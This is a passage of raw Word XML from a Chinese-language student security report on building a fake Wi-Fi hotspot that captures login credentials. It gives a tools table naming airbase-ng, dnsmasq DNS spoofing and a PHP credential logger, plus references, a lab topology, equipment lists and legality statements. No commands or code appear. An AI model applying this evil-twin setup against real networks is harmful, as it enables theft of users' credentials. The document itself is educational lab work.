            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39F3F04B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提供 DHCP 與 DNS 偽導</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="1956975D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F4544EA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airbase-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3761" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F7199FB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 xml:space="preserve">內含於 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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aircrack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                <w:color w:val="141823"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>-ng 工具包</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2646" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="142CE4EA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模擬假無線基地台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="31741166" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29F980A9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PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3761" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63C99DDF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v7.x 以上</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2646" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48BA62FB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接收帳密並寫入 log 檔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="07D3D372" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CCC4434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客戶端設備</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3761" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53616A0A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手機/筆電（支援 Wi-Fi）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2646" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B2DD1BB" w14:textId="77777777" w:rsidR="003646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測試使用者連接與輸入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64636E17" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_heading=h.doscfsu5dqk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="5583529A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bookmarkStart w:id="5" w:name="_heading=h.6ukkcr1p2aar" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/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>十、 參考資料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04CD84" w14:textId="77777777" w:rsidR="003646DE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新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Offensive Security. Kali Linux Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154D0631" w14:textId="77777777" w:rsidR="003646DE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新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-ng 官方網站：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "https://www.aircrack-ng.org/" \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://www.aircrack-ng.org/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F332FC" w14:textId="77777777" w:rsidR="003646DE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新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>dnsmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 官方 GitHub：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "https://github.com/imp/dnsmasq" \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://github.com/imp/dnsmasq</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF7B553" w14:textId="77777777" w:rsidR="003646DE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新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Apache HTTP Server Project：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "https://httpd.apache.org/" \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://httpd.apache.org/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF431CF" w14:textId="77777777" w:rsidR="003646DE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新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>YouTube - Null Byte「How to Create a Fake Wi-Fi Access Point」實作影片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32278108" w14:textId="77777777" w:rsidR="003646DE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新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>SensePost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>hostapd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-mana 攻擊原始碼參考：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "https://github.com/sensepost/hostapd-mana" \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://github.com/sensepost/hostapd-mana</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="308DD78A" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE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</w:p>
    <w:p w14:paraId="4C92957C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>十一、 合法性與道德聲明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7D9369" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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本專題</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>未進行任何非靶機的實際資料蒐集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>，所有帳號密碼輸入僅於靶機進行測試，並不儲存或使用任何真實個資。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="228CE30F" w14:textId="77777777" w:rsidR="003646DE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>模擬登入頁面完全為自設計內容，未使用或模仿任何實際品牌、圖示或官方服務介面，以避免混淆或侵害商標權。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EF8DF8" w14:textId="77777777" w:rsidR="003646DE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>所有實驗設備與受測裝置均為研究人員本人所有或由本人設置控制，確保實驗環境封閉、合法、可控。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E261C91" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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b/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>本研究目的明確限於資訊安全教育與防禦演示展示用途，無任何實際攻擊意圖或未經授權之資料存取行為。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0722A65E" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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本實驗之架構與操作流程，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>符合《個人資料保護法》、刑法第359條（非法進入電腦系統）等相關法律規範</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>，並於合法實驗場域內執行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575526C2" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BCCCAB" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E04C769" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>十二、 附錄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1862FAC3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附錄一：實驗環境拓撲圖（描述版）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283AC8CF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                +--------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723668FD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|      攻擊模擬主機        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C66B02A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| (Kali Linux + airbase-ng)|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8117A4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| IP: 192.168.168.1        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4574ED5B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+-----------+--------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C2A2C9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            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EBD3FC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   虛擬AP介面 at0 (SSID: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>FreeWiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3031A7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            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDBBF7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            v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50ECF0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+------------+-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419E96D8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|      測試裝置 (靶機)     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0DA645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| 手機/筆電 (本人設備)     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B0A20C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| 自願連線至假Wi-Fi測試   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D457F4D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+--------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3177C1" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACBE53B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※ 無實際網路連接外部互聯網</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B25D22A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 xml:space="preserve">                ※ DNS 解析與登入頁服務僅限本地模擬</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC64E8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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B7F557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附錄二：設備清單與控制聲明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194BFB60" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr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一、所有使用設備清單</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af6"/>
        <w:tblW w:w="795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90"/>
        <w:gridCol w:w="3890"/>
        <w:gridCol w:w="1670"/>
      </w:tblGrid>
      <w:tr w:rsidR="003646DE" w14:paraId="33B51CAF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390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5384" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center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類別</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3890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BA6ED" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center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設備名稱/描述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F9FE0" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/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b/>
                <w:color w:val="141823"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>所屬與控制者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="38324E68" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr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A23EA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實驗主機</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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0A6A4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筆電（安裝 Kali Linux 2025）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5CB3B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本人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="5474BEEE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr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6B98E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無線網卡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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96B42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USB Wi-Fi（Realtek RTL88x2BU）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48164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本人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="1B34F6D0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr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95FE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測試用手機</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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FE978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iPhone 一支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C8346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本人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003646DE" w14:paraId="79288018" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr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D4FFE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測試用筆電（靶機）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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2B997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Windows/macOS 筆電（靶機模擬）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8210" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                <w:color w:val="141823"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                <w:color w:val="141823"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>本人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21C7109B" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD4D5C2" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_heading=h.2ibwmum6yf23" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>二、所有權與控制權聲明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C19704F" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/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本人於本實驗過程中使用之所有電腦、手機與無線網卡皆為本人合法所有或持有，且於實驗進行期間未將模擬熱點公開或開放其他未經授權人員使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F651DA" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>所有登入行為與模擬資料輸入皆由本人操作，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>未涉及第三人、未發送任何封包至公網或實體網路外部設備</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>。實驗範圍完全於</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>封閉實驗區域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>內執行，並具完整設備控制權。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003646DE">
      <w:footerReference w:type="default" r:id="rId15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835754" w14:textId="77777777" w:rsidR="00B6745B" w:rsidRDefault="00B6745B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="75D90B1F" w14:textId="77777777" w:rsidR="00B6745B" w:rsidRDefault="00B674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E8804F4-D8BE-4FFF-BD08-9F02234DC15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BBA9ECF-152F-4A80-ABC0-AE0CCE8F8205}"/>
    <w:embedBold r:id="rId3" w:fontKey="{F0BAB867-D725-448F-9C74-0969051831AE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auto"/>
    <w:pitch w:val="default"/>
    <w:embedRegular r:id="rId4" w:fontKey="{842B73E8-8206-4CAF-9037-AD5CC8DEBD53}"/>
    <w:embedItalic r:id="rId5" w:fontKey="{512A5C1D-47CA-4AB3-B71B-3E36CC239CC3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6" w:subsetted="1" w:fontKey="{95933117-2238-466D-A7C4-7FCFFC49A261}"/>
    <w:embedBold r:id="rId7" w:subsetted="1" w:fontKey="{EC2B4E4D-28DE-410E-9CF2-F43EB9AEF47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DD68B891-6F00-486E-A9E3-C4382797AE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9DDE95" w14:textId="77777777" w:rsidR="003646D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3B02FD">
      <w:rPr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  <w:p w14:paraId="7B70C102" w14:textId="77777777" w:rsidR="003646DE" w:rsidRDefault="003646D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1B5373" w14:textId="77777777" w:rsidR="00B6745B" w:rsidRDefault="00B6745B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5A6ACA70" w14:textId="77777777" w:rsidR="00B6745B" w:rsidRDefault="00B674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9F55E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B522509E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F426DB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80EC59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1331F31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D903BAE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7926462"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8D699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A544E53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1ABADA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1115240"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="516E77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70604260">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1698699837">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="604767913">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="644358325">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="484394573">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="4793451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6DE"/>
    <w:rsid w:val="003646DE"/>
    <w:rsid w:val="003B02FD"/>
    <w:rsid w:val="009919F8"/>
    <w:rsid w:val="00B67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90CC0"/>
  <w15:docId w15:val="{806C12F0-6F2A-4974-8349-661C1B793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uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B43917"/>
    <w:pPr>
      <w:ind w:leftChars="200" w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Web">
    <w:name w:val="Normal (Web)"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DD3D64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character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA22A3"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="header"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
